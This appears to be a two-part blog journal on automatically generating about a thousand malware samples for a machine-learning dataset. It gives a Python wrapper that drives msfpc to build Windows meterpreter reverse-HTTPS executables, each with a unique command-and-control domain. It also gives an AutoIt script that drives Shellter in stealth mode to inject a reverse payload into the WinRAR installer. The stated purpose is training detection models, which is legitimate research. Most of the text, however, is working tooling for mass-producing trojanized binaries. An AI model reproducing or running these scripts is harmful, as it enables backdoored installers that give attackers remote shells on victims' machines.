Automating generation of Metasploit payloads

This post serves as a journal of the technique used for automating generation of Metasploit payloads. 

Objective: Generation of 1000 Metasploit payloads each with a unique C&C domain name and binary name.

Purpose: Creation of malware dataset for Machine Learning

Background: Previously i used MSVenom Payload Creator (MSFPC) for quickly generating payloads. MSFPC is a wrapper class on top of MSFVenom. MSFPC is insufficient to meet my objective, thus i had to write a wrapper class on top of MSFPC. 

*So this is a wrapper on top of a wrapper. Technically MSFPC is redundant. 

Overview:
1) On a Kali Linux VM
2) Update Metasploit

apt update
apt install metasploit-framework

3) Install MSFPC

apt install -y msfpc

4) Open gedit and copy the below python script

import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import socket
from socket import error as socket_error
import errno

import subprocess
from subprocess import Popen

#read domain names to use
print ("Reading domain names from csv file:")
df = pd.read_csv('./website.csv')
df.info()
df.describe()
print ("Loaded domain name file")
print("")

correctmsg = "Done"
errmsg = "bignum too big to convert"

startfrom = 2

for index, row in df.iterrows():
	if startfrom > index:
		print ("skip: "+str(row[1]))
		continue

	attempt = 1
	#uncomment the 2 lines below to use the resolved ip address instead 
	try:
		addr = socket.gethostbyname(row[0])
		print(addr)
	except socket_error as serr:		
		if serr.errno == -2:
			print ("Domain: "+row[0]+" is unresolvable, using default IP value instead.")
			row[0] = "127.0.0.1"

	command = "windows " + row[0] + " https" 
	binaryname = str(row[1])+".exe"
	print (command)
	
	#set i to any positive number to start the loop 	
	i = 9999
	x = -1
	while x == -1:
		proc = subprocess.Popen(['msfpc', command], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
		tmp = proc.communicate()[0]
		x = tmp.find(correctmsg)
		#-1 represent errmsg is not found thus implying that crafting is successful
		i = tmp.find(errmsg)
		#print ("i value:" + str(i))

		if i != -1 :
			print ("retrying error crafting payload...: attempting " + str(attempt) + " times")
			attempt = attempt + 1 
		if x == -1 :
			print ("error: " + tmp)
			attempt = attempt + 1 

	print ("Command: msfpc " + command + " is successful.")
	print ("Saving as :" + binaryname)
	subprocess.call('mv ./windows-meterpreter-staged-reverse-https-443.exe ./' + binaryname, shell=True)
	print ("Saved")
	print ("")
	

5) Create a csv file using excel with the following format and save it as website.csv: 

6) Execute the Python script (*internet is needed as msfvenom will validate the LHOST domain name)

7) About 40mins for 100 binaries, 900 to go =)

Metasploit bignum too big to convert into `long' error

Background:
If you are having the following error, it might be that your Metasploit framework is outdated.
I was having this issue when i used Metasploit framework from a Kali 2017 vm image without updating it.

Solution:
1. Update the framework, the below command works on my Kali Linux.

apt update
apt install metasploit-framework

Automating generation of SHELLTER payloads

This post serves as a journal of the technique used for automating generation of SHELLTER payloads. 

Objective: Generation of 1000 SHELLTER payloads each with a unique C&C domain name and binary name.

Purpose: Creation of malware dataset for Machine Learning

Background: SHELLTER is an closed-source shellcode injection framework that performs dynamic PE infection based upon execution flow of the target application. This approach does not modify the original PE header thus allowing it to appear normal using static analysis. 

SHELLTER is a windows PE binary and can be found https://www.shellterproject.com/download/
It can be executed on Linux using WINE or directly in Windows. 

Challenge: I initially ran SHELLTER from Linux but have difficulty automating a WINE terminal. After researching on using PYTHON subprocess, i found it too much of a hassle to attempt redirection to and fro a WINE terminal from a Linux terminal.

Thus i ended up automating SHELLTER from native Windows instead. Autoit is a free software designed for creation of automated scripts. 

Overview of Technique:
1) Create a Win7 VM on VMWARE
2) Download SHELLTER 
3) Download and install Autoit 
4) Open Autoit SciTE script editor
5) Typed in the following script

#include <MsgBoxConstants.au3>;
#RequireAdmin

#include <FileConstants.au3>;
#include <MsgBoxConstants.au3>;
#include <WinAPIFiles.au3>;
#include <File.au3>;


;If IsAdmin() Then MsgBox($MB_SYSTEMMODAL, "", "The script is running with admin rights.")

Func Generate($vVar1 = "google.com")
 Run('.\shellter.exe')
 Sleep(1000)
 WinWaitActive("Shell7er", "", 1)

 ;automate
 Send("A{Enter}")
 Sleep(1000)

 ;Do not check update
 Send("N{Enter}")
 Sleep(1000)

 ;original binary path
 Send(".\wrar560.exe{Enter}")
 Sleep(35000)

 ;Stealth mode
 Send("Y{Enter}")
 Sleep(1000)

 ;payload selection
 Send("l{Enter}")
 Sleep(2000)
 Send("3{Enter}")
 Sleep(1000)

 ;domain name
 Send($vVar1)
 Send("{Enter}")
 Sleep(1000)

 ;port number
 Send("443{Enter}")
 Sleep(10000)

 Send("{Enter}")
EndFunc


Func print($test3)
 MsgBox($MB_SYSTEMMODAL, "", $test3)
EndFunc

$file = ".\website.csv"
FileOpen($file, 0)

;2 is first entry, 1 is the header
$StartFrom = 2

For $i = $StartFrom to _FileCountLines($file)
    $line = StringSplit(FileReadLine($file, $i),",")
 $domainName = $line[1]
 Generate($domainName)
 ;print($line[2])
 Sleep(3000)
 $sDestination = ".\malware\" & $line[2]
 ;MsgBox($MB_SYSTEMMODAL, "", $sDestination)
 FileMove(".\wrar560.exe", $sDestination, $FC_OVERWRITE)
 FileMove(".\Shellter_Backups\wrar560.exe", ".\wrar560.exe", $FC_OVERWRITE)
Next

FileClose($file)

6) Save the Autoit script in the same directory where Shellter.exe resides in.
7) Create a csv file using excel with the following format and save it as website.csv: 

8) I have chosen to pack winrar (wrar560.exe) with the payload, you may find it here https://www.rarlab.com/rar/wrar560.exe
9) Save wrar560.exe to the same directory as Shellter.exe
10) Execute the Autoit script 

Results: 
Took about 2 days to create over 900 malware samples. 100 more to go =)

Feel free to modify the script accordingly.